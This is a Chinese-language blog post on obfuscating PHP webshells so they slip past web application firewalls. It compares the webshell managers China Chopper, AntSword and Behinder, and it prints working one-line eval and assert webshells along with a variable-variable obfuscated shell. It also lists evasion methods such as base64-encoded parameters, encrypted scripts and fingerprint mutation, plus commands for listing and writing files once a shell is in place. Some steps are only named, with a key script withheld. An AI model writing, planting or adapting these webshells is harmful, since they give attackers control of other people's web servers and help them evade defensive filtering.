type
status
date
slug
summary
tags
category
icon
password
0x00 简介
为了获取对方的控制权,通常会采取使用代码木马执行,使用shell工具连接,但是往往注入代码会被waf拦截,无法注入也就无法获取shell连接,就算绕过代码检测之后,执行的行为也可能被waf设备拦截,导致无法执行shell操作,下面从代码的注入绕过,与代码注入后执行操作绕过总方法,下面总结几种最新的绕过姿势。
常见脚本: PHP, JSP, ASP, ASPX, Pytohn......
常见shell工具:中国菜刀, 蚂蚁宝剑, 冰蝎
比较推荐使用冰蝎适合后渗透,菜刀的使用比较局限也没有更新了,
菜刀:未更新状态,无插件,单向加密传输
蚁剑:更新状态,有插件,拓展性强,单向加密传输
冰蝎:更新状态,未知插件,双向加密传输
0x01 木马绕过思路姿势
1)代码替换思路:
> 常见使用替换
<?php @eval($_POST['hsyy']);?>
<?php assert($_POST['hsyy']);?>
将eval函数替换成assert,eval属于常见的敏感函数,极为被拦截,
当然多数情况简单的替换都无法绕过,比较鸡肋,这是一种思路提供
2)代码变量覆盖传参思路:
(禁止使用简单的变量传递,大多数waf具有变量追踪,必需要引入变量覆盖传递参数)
<?php
//@eval($_POST[123]);
$a=$_GET['x'];
$$a=$_GET['y'];
$b($_POST['z']);
//post传参?x=b&y=assert
?>
3)加密传输思路
这里使用base64加密传递参数,防止代码写入连接shell无法执行
4)代码接口加密思路
这里推荐php加密网站
未加密前:
接口加密
加密后:
WAF验证:
5)脚本加密,通杀市面普遍的waf设备!
加密脚本联系作者,因创作者未公开
WAF验证:
结合加密编码后绕
- *6)指纹变异:....难度较大,需要开发经验反复尝试,
7)自写轮子连接上shell却无法执行情况使用
查看文件:var_dump(scandir('.'));
写入文件以及文件内容:file_put_content('文件位置','内容');
遇到实际情况可以根据抓取数据包分析,采用人工+工具分析
以上提供思路,无法绕过说明任然有waf规则拦截,需要再寻找方法
- 作者:告白
- 链接:https://www.gbsec.top/article/WAF%E7%BB%95%E8%BF%87-%E6%9C%A8%E9%A9%AC%E6%B7%B7%E6%B7%86%E5%85%8D%E6%9D%80%E5%A7%BF%E5%8A%BF
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。
相关文章